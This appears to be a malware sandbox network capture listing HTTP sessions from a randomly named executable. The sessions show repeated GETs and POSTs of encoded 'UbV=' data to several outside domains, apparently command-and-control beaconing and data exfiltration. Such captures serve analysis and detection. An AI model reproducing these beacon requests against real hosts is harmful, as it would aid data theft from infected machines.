                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=HckgqG6UuhTDqNRqvj1n2TU6zWEKTi+AIIba+2GPW+zXf3FvbAMQXxESQESWYoQhhzOiSTahoUA3dTdc5UuyLXF6ovH0nTrju95ktnGFNcVg/Uww90EzIGdVa8RKcCp0wx4fXmW85f2wcuscoK6oEi02IE0gnZN3GibuN5oiywe1FZit5kuNKtN83cERPMQZnKeabff6qRTUKh9JF48knO72JLeiqPpa/jaRhz8NYWfUi0PXi0An0NKZIZRbwbN1xLYIslk2ck3/yc3EpUwhy/9tJT4w4N2AY0eB4WrO1Yl85950CjnDxQQ7e6PpZvm/Cva1g8TX3s9SXbA8tpSgPzB8ESRosey2bt9XvlgtdRV535ecW10WTFQtz3w+HnkFlUbkRwbsMhi1vLxAbd1h/068r2DX4glqEhGnvRgma+o4yQtpgNeSbzKQ6lRPawNeiC9XaKCbuIokIl9WpkeEB3fcmtgja9JrywtgZiluvNCqgEV5idJ66JVrOk9A8mx+pUkkBK17S5ELMk42vNNLsZU2RnT6KO0EAAAXZBgkuduW9eFX7OwiplQbdVQDPa52I7RWqKmLaAzcfizpXqhyhTMnImQ2R8KGKGiRkEQJomPUmSnWeaLNfxt874cfnbP2r03jSQwHDc2yME5c1wtDyBF0OkxX/oOEbh/Z5p18W1OHX45ysJuf+29s2/QZB+Q3+5DpT6qKRNTETaNYT2WV2yiMG3/ZYRM8ZhhtC08r53ymg9IKF3VJhHTRR9NuZsoPu0I6i2UlXDYr0O9TaLEQnBKIYQIdib0sQGlxn0s2kWc/CCIhM+ZiAzIHdZpzT/rJg+0pSDiZ50wHQN6PnAd8dGo9F9oC9yCcIBQYgsw6Eo6D5aeEzdCV9AkHaVE30krKAwAFLx1OcrlN6nMY5ix4hQAO48YQGSZ7B75xyTcSoELh1UCfgxkd4bW13FrC9x/0otALJ4fjtZjt2IzPgGN5z3Q6/WR7fH5Gjyze1FHeAXYemRzE [TRUNCATED]


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            32 | 192.168.2.4 | 49769 | 3.33.244.179 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:51.778145075 CEST | 369 | OUT | GET /xifn/?UbV=KeMApzCPoibat+BJrS4W/yBC5Ro5YTaRI5q2x3+rXL+pd1pzECcJYSRXND6sMrc7vw3XUkLR+QUTQhFw9n6rFEpLq+HIvi3a35dAhTq9JdFe3G51xVcQNW0=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.bestandpure.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:23:52.260881901 CEST | 395 | IN | HTTP/1.1 200 OK
                            Server: openresty
                            Date: Tue, 16 Jul 2024 05:23:52 GMT
                            Content-Type: text/html
                            Content-Length: 255
                            Connection: close
                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UbV=KeMApzCPoibat+BJrS4W/yBC5Ro5YTaRI5q2x3+rXL+pd1pzECcJYSRXND6sMrc7vw3XUkLR+QUTQhFw9n6rFEpLq+HIvi3a35dAhTq9JdFe3G51xVcQNW0=&Y4gp=mlltcrRxcL"}</script></head></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            33 | 192.168.2.4 | 49770 | 104.21.89.46 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:57.319680929 CEST | 649 | OUT | POST /1mac/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.rtpdewata4d-16.xyz
                            Origin: http://www.rtpdewata4d-16.xyz
                            Referer: http://www.rtpdewata4d-16.xyz/1mac/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=iHqHH7OinISKTWzupNeQFWfGg+naP2OTgMsuRTiM9fHHkltaLl9zjsapgn9MMKfSA2AE3qh2OXeEWm2inq6iW8Ggb0eZzGLAX3/tYHAZMcIIeVlTq00JrUfvFUjm9KXIaCLH4D/w88F2KBru+rFKfL6JoLgEeW4szX8utROUzCkgyDELEax8Vumvl0VjqUikHQ==
                            Jul 16, 2024 07:23:57.956109047 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:23:57 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                            pragma: no-cache
                            x-turbo-charged-by: LiteSpeed
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nJCoYmK3BjF0UYVznBl%2BiE5ToopB7PPycSta6r7iXE8G7ip7WNPiEfCM3aTNKQec37I37cweaMm8b4p3Fz8jF3tf%2FIAGR4iShFkrP7Cj6LFLt4%2FxX79xovgoyKYNQSf%2BO4xBhgZmrOdJ"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a3f902dbf841906-EWR
                            Content-Encoding: gzip
                            alt-svc: h3=":443"; ma=86400
                            Data Raw: [gzip-compressed chunked response body omitted]
                            Jul 16, 2024 07:23:57.956134081 CEST | 223 | IN | Data Raw: [gzip-compressed chunk continuation omitted]


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            34 | 192.168.2.4 | 49771 | 104.21.89.46 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:23:59.862617016 CEST | 669 | OUT | POST /1mac/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.rtpdewata4d-16.xyz
                            Origin: http://www.rtpdewata4d-16.xyz
                            Referer: http://www.rtpdewata4d-16.xyz/1mac/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 69 48 71 48 48 37 4f 69 6e 49 53 4b 54 31 37 75 73 73 65 51 48 32 66 42 6c 2b 6e 61 42 57 4f 49 67 4d 67 75 52 53 6e 4a 36 73 6a 48 6c 48 31 61 4b 68 70 7a 67 73 61 70 30 58 38 47 53 36 65 2f 41 32 45 32 33 71 74 32 4f 58 4b 45 57 6e 6d 69 6e 5a 43 74 56 4d 47 69 44 45 65 62 75 32 4c 41 58 33 2f 74 59 48 55 33 4d 63 51 49 65 47 74 54 72 57 51 4b 6d 30 65 64 41 55 6a 6d 35 4b 58 4d 61 43 4c 66 34 43 54 61 38 2f 74 32 4b 45 76 75 35 36 46 4e 56 4c 36 50 73 4c 68 54 5a 6e 4e 46 36 55 78 63 6a 52 43 47 36 47 55 46 2b 6c 56 52 56 72 51 72 48 75 43 63 34 7a 63 58 6e 58 66 74 63 53 6d 39 34 6d 76 63 6d 50 64 52 65 77 32 38 33 33 58 6d 5a 6c 55 3d
                            Data Ascii: UbV=iHqHH7OinISKT17usseQH2fBl+naBWOIgMguRSnJ6sjHlH1aKhpzgsap0X8GS6e/A2E23qt2OXKEWnminZCtVMGiDEebu2LAX3/tYHU3McQIeGtTrWQKm0edAUjm5KXMaCLf4CTa8/t2KEvu56FNVL6PsLhTZnNF6UxcjRCG6GUF+lVRVrQrHuCc4zcXnXftcSm94mvcmPdRew2833XmZlU=
                            Jul 16, 2024 07:24:00.478413105 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:00 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                            pragma: no-cache
                            x-turbo-charged-by: LiteSpeed
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B177A76T7IPVWI1sKZ%2FxOjhUmnR0Jjl3q70OPIiKib9b%2Fi%2FAgs%2B7fY66BeYkDaLsiQSyD7yw9F9YFRK54hkxEkUULKafKpcwsIqcggv8EBUPPdH6qZPA9efsRy0Bwoh4Z2pz7IVr22eK"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a3f903d9d29439f-EWR
                            Content-Encoding: gzip
                            alt-svc: h3=":443"; ma=86400
                            Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                            Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!
                            Jul 16, 2024 07:24:00.478470087 CEST | 223 | IN | Data Raw: 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72 b5 9a c3 e3 24 ae 6f ae 80 6c
                            Data Ascii: E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?e0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            35 | 192.168.2.4 | 49772 | 104.21.89.46 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:24:02.406482935 CEST | 10751 | OUT | POST /1mac/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.rtpdewata4d-16.xyz
                            Origin: http://www.rtpdewata4d-16.xyz
                            Referer: http://www.rtpdewata4d-16.xyz/1mac/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 69 48 71 48 48 37 4f 69 6e 49 53 4b 54 31 37 75 73 73 65 51 48 32 66 42 6c 2b 6e 61 42 57 4f 49 67 4d 67 75 52 53 6e 4a 36 73 72 48 6b 30 39 61 4c 44 42 7a 68 73 61 70 33 58 38 46 53 36 65 48 41 79 6f 49 33 71 77 44 4f 55 79 45 5a 67 6d 69 32 63 75 74 4f 63 47 69 4b 6b 65 61 7a 47 4c 76 58 30 48 54 59 48 45 33 4d 63 51 49 65 48 64 54 39 30 30 4b 6b 30 66 76 46 55 6a 79 39 4b 58 30 61 43 54 50 34 43 58 67 2f 50 4e 32 4b 6b 66 75 38 4a 74 4e 57 72 36 4e 70 4c 68 62 5a 6e 52 65 36 55 63 6c 6a 53 65 6f 36 42 6b 46 74 44 39 4a 46 4b 38 67 63 39 6d 79 70 43 49 72 71 58 50 55 51 6a 6d 33 33 57 33 55 30 74 56 45 52 7a 62 49 77 57 47 6b 4f 53 68 65 51 32 33 65 6e 61 57 55 5a 45 71 69 38 44 31 39 6e 6b 49 65 69 69 64 65 54 39 75 59 53 31 31 4c 55 58 30 31 6f 39 34 47 77 54 2b 74 44 35 75 4a 30 42 42 41 4b 32 35 2b 61 2f 35 42 48 7a 77 4d 2b 2f 30 6a 57 4d 44 56 32 63 61 4a 56 53 2f 4a 5a 2f 4f 72 54 67 35 74 78 32 5a 6a 51 4c 6b 5a 54 7a 32 52 37 6c 33 59 6a 7a 64 70 31 5a 69 30 2f 63 48 39 63 4e [TRUNCATED]
                            Data Ascii: UbV=[TRUNCATED]
                            Jul 16, 2024 07:24:03.037378073 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:02 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                            pragma: no-cache
                            x-turbo-charged-by: LiteSpeed
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2aN9wr7lJ29%2FUjEFpICarqZkz%2ByjmxfKov%2BrKmR31agOYSNKAh85icrVNVa5Nh8JpdDNJvxiVT9VyVhnynW%2BXCeDCnOPBHWf069Mn1EyS8mCxIMrC6%2F7JH0dHH%2Bcz0%2BtXDWDrpuIpr4v"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a3f904d8aec0c7a-EWR
                            Content-Encoding: gzip
                            alt-svc: h3=":443"; ma=86400
                            Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                            Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM
                            Jul 16, 2024 07:24:03.037401915 CEST | 234 | IN | Data Raw: 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72 b5 9a c3 e3
                            Data Ascii: [!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?be0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            36 | 192.168.2.4 | 49773 | 104.21.89.46 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:24:04.954129934 CEST | 372 | OUT | GET /1mac/?UbV=vFCnEL2gmua2cn7cu+7uA1zrn4XuDHvsitE9TDncytOkj3MvcAAJscub939fSKqOURYthMBxIAmeZUaSv4+xK96qNWaFi0LmQ135fUkfGeU9K1xxgFotmEw=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.rtpdewata4d-16.xyz
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:24:05.570314884 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:05 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                            pragma: no-cache
                            x-turbo-charged-by: LiteSpeed
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DwfNoiDezcem3Y6PqHqhqTpcfGlo4MO9njk8RKNTeSQKBJ5y%2BcqpK25nTQ36ZpO3HvUbtqIDga65DIIQrZ0bb3sX3Orm1Ts3huRYtuWDxyuiDc3N8RlUOiBFGaYH8kinTkHpWVrPuPBg"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a3f905d7fed4414-EWR
                            alt-svc: h3=":443"; ma=86400
                            Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 [TRUNCATED]
                            Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:
                            Jul 16, 2024 07:24:05.570398092 CEST | 716 | IN | Data Raw: 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68
                            Data Ascii: 50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            37 | 192.168.2.4 | 49774 | 172.67.196.1 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:24:10.610856056 CEST | 643 | OUT | POST /0koa/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.itsjojosiwas.com
                            Origin: http://www.itsjojosiwas.com
                            Referer: http://www.itsjojosiwas.com/0koa/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 72 6d 4a 54 2f 41 2f 71 64 4d 32 35 54 43 32 65 63 34 4e 61 36 68 6a 6a 34 31 68 65 65 31 55 30 77 48 59 75 2b 47 41 4a 71 6b 72 44 50 33 6f 67 64 30 56 47 4b 6c 79 74 44 68 51 69 4b 32 2b 7a 46 4b 6a 46 50 44 56 4d 74 68 36 44 56 57 6d 42 31 34 76 47 75 52 61 69 6f 71 70 34 39 37 47 49 6c 6f 6d 31 49 69 49 6a 54 39 5a 4c 49 4f 69 73 4b 47 73 49 32 35 49 4c 45 41 38 55 48 2f 68 78 6a 72 59 30 54 49 64 6b 49 4d 2f 39 33 72 67 65 71 30 6f 68 77 54 6c 2f 78 76 4a 6c 37 61 76 4d 4e 47 68 47 6d 6e 42 59 55 57 65 41 6d 71 7a 5a 61 2f 72 70 74 76 2b 5a 48 39 5a 5a 4a 2f 4e 75 6e 77 3d 3d
                            Data Ascii: UbV=rmJT/A/qdM25TC2ec4Na6hjj41hee1U0wHYu+GAJqkrDP3ogd0VGKlytDhQiK2+zFKjFPDVMth6DVWmB14vGuRaioqp497GIlom1IiIjT9ZLIOisKGsI25ILEA8UH/hxjrY0TIdkIM/93rgeq0ohwTl/xvJl7avMNGhGmnBYUWeAmqzZa/rptv+ZH9ZZJ/Nunw==


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            38 | 192.168.2.4 | 49775 | 172.67.196.1 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:24:13.159827948 CEST | 663 | OUT | POST /0koa/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.itsjojosiwas.com
                            Origin: http://www.itsjojosiwas.com
                            Referer: http://www.itsjojosiwas.com/0koa/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 72 6d 4a 54 2f 41 2f 71 64 4d 32 35 54 68 75 65 51 35 4e 61 76 78 6a 67 30 56 68 65 4d 31 55 77 77 48 55 75 2b 48 46 57 71 33 50 44 4f 57 59 67 63 31 56 47 5a 56 79 74 58 78 51 74 46 57 2f 78 46 4b 75 79 50 43 70 4d 74 6c 53 44 56 53 69 42 31 50 44 48 68 68 61 67 6e 4b 70 36 35 37 47 49 6c 6f 6d 31 49 6a 74 47 54 39 42 4c 49 37 71 73 59 6b 55 4c 31 35 49 4d 4f 67 38 55 4e 66 68 31 6a 72 59 73 54 4d 46 65 49 4a 37 39 33 71 51 65 6b 47 41 69 70 6a 6c 39 31 76 49 6e 79 36 61 2b 45 58 42 4f 6e 45 51 38 4b 57 65 77 75 4d 69 44 4c 4f 4b 2b 2f 76 61 71 61 36 51 74 45 38 77 6e 38 7a 4b 5a 46 4a 39 57 79 62 4d 30 49 6d 4e 52 42 68 55 55 4f 39 30 3d
                            Data Ascii: UbV=rmJT/A/qdM25ThueQ5Navxjg0VheM1UwwHUu+HFWq3PDOWYgc1VGZVytXxQtFW/xFKuyPCpMtlSDVSiB1PDHhhagnKp657GIlom1IjtGT9BLI7qsYkUL15IMOg8UNfh1jrYsTMFeIJ793qQekGAipjl91vIny6a+EXBOnEQ8KWewuMiDLOK+/vaqa6QtE8wn8zKZFJ9WybM0ImNRBhUUO90=
                            Jul 16, 2024 07:24:14.799103975 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
                            Set-Cookie: CSRF=1721107453781; path=/
                            Set-Cookie: PHPSESSID=4i6sn1bhhvc7a5s6kkdqb09nvc; path=/
                            Pragma: no-cache
                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                            Cache-Control: no-cache, must-revalidate, max-age=0
                            Link: <https://www.itsjojosiwas.com/wp-json/>; rel="https://api.w.org/"
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p79prrqyA5CrYcCZR7vzG7Ds5MoZGQaAg0WaRU1uaQg4IPJnvAYwgA8zaof52OwwDPL2vhaKAYDFK2H0tNVhn6TENg6YFyOq9pO8anOEgVqh7IRH05%2BBpMNKW74YQkfJ2xnC6OTeuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a3f9090df395e66-EWR
                            Content-Encoding: gzip
                            alt-svc: h3=":443"; ma=86400
